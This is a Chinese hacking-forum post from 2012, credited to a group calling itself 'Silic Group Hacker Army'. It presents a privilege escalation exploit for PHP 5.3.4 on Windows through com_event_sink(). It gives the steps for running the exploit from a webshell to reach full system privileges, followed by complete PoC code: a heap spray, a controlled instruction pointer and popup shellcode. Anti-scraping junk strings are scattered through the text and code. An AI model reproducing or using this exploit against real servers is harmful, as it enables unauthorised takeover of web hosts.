找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2238|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
: F7 \. Z- Y/ n# J! Z! u' |% d8 }; R# `9 m2 P1 ?- r
测试方法如下:cmd /c x:\php\php.exe x:\test.php
5 l# l! n4 A' H3 t+ Z) J: T/ j
# ~/ s1 f$ k8 [# d! ^3 x. d下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
# \6 ]; P& ~; \7 c$ l这里是两个测试的截图:, G- M3 ^9 w" i: ?

* V+ z, K* C0 O1 L2 U" T' a- o9 q* P3 \5 k' @) j: t0 Z
& b6 f* Z8 |' j$ A

8 L' B. o0 u! v$ \2 k5 t
1 x! U- {% U) f  A, W5 {6 w0 a, A0 `成功利用此漏洞的攻击者将获得系统的最高权限
/ V2 G4 o' p# R  J8 n3 r) H
% C2 ^! E5 P6 \
* T% C  j0 }0 H7 V3 V* G' F. R+ N8 H5 c* A0 K& Z1 e+ @

  F$ k& x5 N3 O9 k. U8 W( q5 l" b/ d4 n% F  @2 i4 Q
关于漏洞分析稍后附上。一下是PoC代码:6 h8 d" }+ F# b5 j' o

. m4 ?6 t9 L/ n' r' p, ]<?php* t' {# }7 l; r- c; s0 T" P) n( ~
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞. i( C. Y5 C% o! X
//$eip ="\x44\x43\x42\x41";
0 Q* v/ B% ?0 q2 Y; z, ^: j$eip= "\x4b\xe8\x57\x78";3 P6 E2 ^  m9 @$ |
$eax ="\x80\x01\x8d\x04";  s8 U/ ~% B0 |
$deodrant="";/ ~* ]+ j0 H; B8 N
$axespray = str_repeat($eip.$eax,0x80);
  K6 L+ w6 I; h! x- _//048d0190- s: D% r5 U5 j; e8 @
echo strlen($axespray);6 f' P0 A; ]' g, h+ J
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
  B8 A6 J8 M( A' Xecho "Silic Group Hacker Army - BlackBap.Org";
% g4 ^3 m* b- P+ E4 j# D//19200 ==4B32 4b004 g% h' S, Z$ `  W5 {1 `' T' w8 }
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}$ I6 U+ p& w" P; r1 Y0 {
$terminate = "T";
9 w/ X* O# V8 }0 ]* q$u[] =$deodrant;. M5 }8 o$ S1 e! ?1 V* |9 X6 A8 u6 h
$r[] =$deodrant.$terminate;
  i2 K9 w" i1 m0 Z- b+ M$a[] =$deodrant.$terminate;
1 F! w" q/ z0 Z1 W7 R# O3 E$s[] =$deodrant.$terminate;
' [$ d% H+ \! u  [. {  ~//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的0 f: Q0 O0 [( V% s; [( z. X
$vVar = new VARIANT(0x048d0000+180);5 ^2 z' j+ J: o0 G0 F) o  f
//弹窗代码(Shellcode): b& l  P) w& n8 P; c
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";' a% j+ ]0 t$ E* V# ?
$var2 = new VARIANT(0x41414242);
/ c% x6 t" v% O% G! B- H6 `# J$ ecom_event_sink($vVar,$var2,$buffer);
4 O3 S6 O7 x, g0 U  e?>
3 J; i- t. h+ G

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表